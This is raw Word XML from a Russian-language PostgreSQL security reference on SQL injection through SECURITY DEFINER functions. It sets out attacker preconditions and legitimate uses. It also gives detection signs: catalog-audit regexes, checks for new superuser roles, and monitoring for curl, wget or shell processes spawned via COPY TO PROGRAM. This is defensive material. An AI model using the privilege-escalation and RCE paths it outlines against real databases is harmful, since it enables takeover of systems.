          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND p.prosrc !~ '\bformat\s*\(.*%I'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303C9994" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY n.nspname, p.proname;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC871A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Этот query показывает SD-функции с EXECUTE без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format(... %I ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — кандидаты на ручной аудит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A37BD18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775E3AF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии (SECURITY DEFINER — с очень ранних).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7508786E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE на уязвимую SD-функцию. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Superuser не требуется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это и есть смысл атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101136A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия жертвы (owner функции):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> типично superuser или application-admin. Чем выше privilege owner-а, тем дороже атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0152A24D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функция с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE ... || ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', ident)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2920D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SECURITY DEFINER + dynamic SQL — стандартный паттерн для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DCB848" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit-trail wrappers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (логирование действий пользователей через защищённую таблицу).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C969CF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permission-check functions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>check_can_access(user, resource) → bool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под privileged context).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09107E7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tenant management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (admin-only DDL операции на user-specified schemas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D10ADA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Generic CRUD-wrappers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для multi-tenant приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A22B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все эти use cases легитимны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>при условии правильного использования identifier-защиты + whitelist + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t>. Pattern из «Защита» выше — canonical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42319D71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471DA49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (статически):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFDB05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosecdef = true AND prosrc ~ '\\bEXECUTE\\b' AND prosrc !~ '\\bformat\\s*\\(.*%I'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SD-функции с EXECUTE без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271200A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosecdef = true AND prosrc ~ '\\|\\|'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SD-функции с concat (требуют ручного аудита).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AF8BC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosecdef = true AND proconfig IS NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SD-функции без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.13.6 риск).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01919F2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements` + `pg_authid` cross-check</w:t>
      </w:r>
      <w:r>
        <w:t>: новые SUPERUSER-роли, созданные в окне после EXECUTE SD-функции от non-DBA caller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A93FAAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_event_trigger`</w:t>
      </w:r>
      <w:r>
        <w:t>: triggers, созданные в окне после EXECUTE SD-функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04B8AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS-monitoring</w:t>
      </w:r>
      <w:r>
        <w:t>: процессы под postgres-user (curl, wget, sh, bash) от COPY TO PROGRAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DDDDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = mod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = ddl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для всех SD-функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A4CA97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SECURITY DEFINER — все версии PG. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 17 mitigation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> role + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> privilege снижает использование SECURITY DEFINER для maintenance tasks. Никакие фиксы не закрывают 3.16.5 — это application-level плюс design-feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FCC6E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C66EFF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.1 format %s vs %I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — single source of identifier-injection (R18 base).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410E073" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.2 quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — alternative для same protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F7013" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.3 EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для значений; обязательный complement к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB49A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.4 || конкатенация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — самый частый source 3.16.5 в реальных функциях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044F006" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — parallel class уязвимостей в SD-функциях (hijack без injection). Граница: 3.13.6 — name resolution; 3.16.5 — SQL text injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8C8B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.X (other privilege escalation patterns)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF7BC63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B finale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41030180" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2/3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — alternative RCE paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D55AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — owner SD-функций должен иметь minimum required privileges, не automatic superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ACC74F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D66E609" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «CREATE FUNCTION» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/sql-createfunction.html#SQL-CREATEFUNCTION-SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93B3ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Writing SECURITY DEFINER Functions Safely» — https://www.postgresql.org/docs/current/sql-createfunction.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A379B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «Predefined Roles» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/predefined-roles.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E40B19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   PostgreSQL 17 Release Notes (pg_maintain introduction) — https://www.postgresql.org/docs/release/17.0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488ABD76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   2ndQuadrant blog: «SECURITY DEFINER pitfalls» — https://www.2ndquadrant.com/en/blog/security-definer/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93299E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Wiki: «Security» / SECURITY DEFINER best practices — https://wiki.postgresql.org/wiki/Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B04C64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R18 (sources/research.md, строки 274–291)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F88CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари: категория 3.16 Identifier injection в plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFC63D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.16 покрывает identifier-injection в серверном коде на PL/pgSQL — класс уязвимостей в dynamic SQL, где user-controlled identifier (имя таблицы, колонки, схемы) попадает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без правильного quoting. R18 — основной research-anchor; все пять подразделов разбирают разные грани одной системной проблемы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL Wire Protocol bind-параметры не работают для identifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и разработчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>должен явно вызвать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / USING — иначе любая identifier-position становится injection-точкой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC4DA9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Главный тезис категории: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>identifier и value требуют разных защитных инструментов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Identifier — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
